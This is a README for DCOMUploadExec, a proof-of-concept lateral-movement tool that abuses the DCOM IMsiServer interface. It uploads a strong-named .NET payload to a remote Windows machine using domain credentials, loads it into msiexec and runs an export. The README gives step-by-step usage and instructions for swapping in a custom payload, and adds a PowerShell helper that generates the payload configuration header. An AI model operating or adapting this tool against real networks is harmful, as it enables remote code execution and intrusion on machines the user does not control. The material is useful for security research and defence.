DCOM Lateral movement POC abusing the IMsiServer interface
https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor
The solution contains 2 projects:
- DCOMUploadExec - A C++ project which hosts the lateral movement attack code
- AssemblyPayload - A .NET DLL that pops a MessageBox. It is the default payload DCOMUploadExec uses.
Compile the solution
Usage: DCOMUploadExec.exe [domain]\[user]:[password]@[address]
Local Usage: DCOMUploadExec.exe LOCALHOST (Run this as administrator)
DCOMUploadExec.exe will:
- Upload the default payload DLL, AssemblyPayload, to the remote PC
- Load the DLL into a remote msiexec.exe process
- Execute an export from the DLL
- Receive the export's return value
The payload must be a strong-named .NET assembly.
PayloadConfig.h configures the payload DCOMUploadExec will use. By default it points to the build output of AssemblyPayload.
In order to use a custom payload:
- Create a strong-named .NET assembly that exports a function named InitializeEmbeddedUI. This is the export DCOMUploadExec will eventually execute on the remote target.
- Fill your custom payload's details in PayloadConfig.h:
  - PAYLOAD_ASSEMBLY_PATH = // local path to your created payload
  - ASSEMBLY_NAME = // the assembly name
  - ASSEMBLY_BITNESS = // "64" for an x64 payload, "32" for an x86 payload
  - ASSEMBLY_VERSION = // the version number printed by: sigcheck.exe -n PAYLOAD_ASSEMBLY_PATH
  - ASSEMBLY_PUBLIC_KEY = // the public key token printed by: sn.exe -T PAYLOAD_ASSEMBLY_PATH
- Compile DCOMUploadExec and use it.
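The five PayloadConfig.h values above can be read from the payload's own assembly metadata, which also lets you reject a payload that breaks the rules (not strong-named, or built AnyCPU) before you ever touch the target. The script below is an added helper and is not part of the DCOMUploadExec project: it assumes the macro names listed in the README, and the `#define L"..."` layout it emits is a guess that you should adjust to the real PayloadConfig.h syntax before compiling.

```powershell
<#
  Added helper, not part of the DCOMUploadExec project.
  Reads the PayloadConfig.h values from a payload assembly's metadata and
  refuses payloads that violate the README's rules (must be strong-named,
  must be x86 or x64, not AnyCPU).
  Assumptions: macro names as listed in the README; the "#define L"..."" layout
  is a guess, adjust it to the real PayloadConfig.h before compiling.
#>
param(
    [Parameter(Mandatory = $true)][string]$PayloadPath,
    [string]$OutFile = ".\PayloadConfig.generated.h"
)

$full = (Resolve-Path -LiteralPath $PayloadPath).Path

# Throws BadImageFormatException for a native (non-.NET) DLL, which is itself
# a useful check: the payload has to be a managed assembly.
$an = [System.Reflection.AssemblyName]::GetAssemblyName($full)

# Strong-name check: an unsigned assembly has no public key token.
$token = $an.GetPublicKeyToken()
if ($null -eq $token -or $token.Length -eq 0) {
    throw "$full is not strong-named; sign it before using it as a payload."
}
# Same 16 hex digits that 'sn.exe -T' prints.
$tokenHex = ([System.BitConverter]::ToString($token) -replace '-', '').ToLower()

# Bitness: MSIL means AnyCPU, which the README says is unsupported.
switch ($an.ProcessorArchitecture.ToString()) {
    'Amd64' { $bitness = '64' }
    'X86'   { $bitness = '32' }
    default { throw "Payload is '$($an.ProcessorArchitecture)'; build it for x86 or x64, not AnyCPU." }
}

# The README takes ASSEMBLY_VERSION from 'sigcheck.exe -n', i.e. the file
# version resource. Default .NET projects keep it equal to the assembly
# version, but AssemblyFileVersion and AssemblyVersion can diverge, so read
# both, use the file version, and warn when they differ.
$asmVersion  = $an.Version.ToString()
$fileVersion = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($full).FileVersion
if ([string]::IsNullOrEmpty($fileVersion)) {
    Write-Warning "No file version resource found; falling back to assembly version $asmVersion."
    $fileVersion = $asmVersion
} elseif ($fileVersion -ne $asmVersion) {
    Write-Warning "File version ($fileVersion) differs from assembly version ($asmVersion); using the file version, as sigcheck -n would."
}

$values = [ordered]@{
    PAYLOAD_ASSEMBLY_PATH = $full
    ASSEMBLY_NAME         = $an.Name
    ASSEMBLY_BITNESS      = $bitness
    ASSEMBLY_VERSION      = $fileVersion
    ASSEMBLY_PUBLIC_KEY   = $tokenHex
}

# Emit one #define per value; backslashes in the path are doubled for C++.
$lines = foreach ($k in $values.Keys) {
    $v = $values[$k] -replace '\\', '\\'
    '#define {0,-22} L"{1}"' -f $k, $v
}
$lines | Set-Content -Path $OutFile -Encoding ASCII
Write-Host "Wrote $OutFile"
$lines
```

Run it as `.\Get-PayloadConfig.ps1 -PayloadPath .\AssemblyPayload\bin\x64\Release\AssemblyPayload.dll` (the path is an example) and compare the printed token and version once against `sn.exe -T` and `sigcheck.exe -n` for your build before trusting the generated header.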
Requirements and limitations:
- The attacker and victim machines must be in the same domain or forest.
- The attacker and victim machines must be in the same state with respect to the DCOM hardening patch (KB5004442, CVE-2021-26414): either applied on both systems or absent on both.
- The assembly payload must be strong-named.
- The assembly payload must be built for x86 or x64 (it cannot be AnyCPU).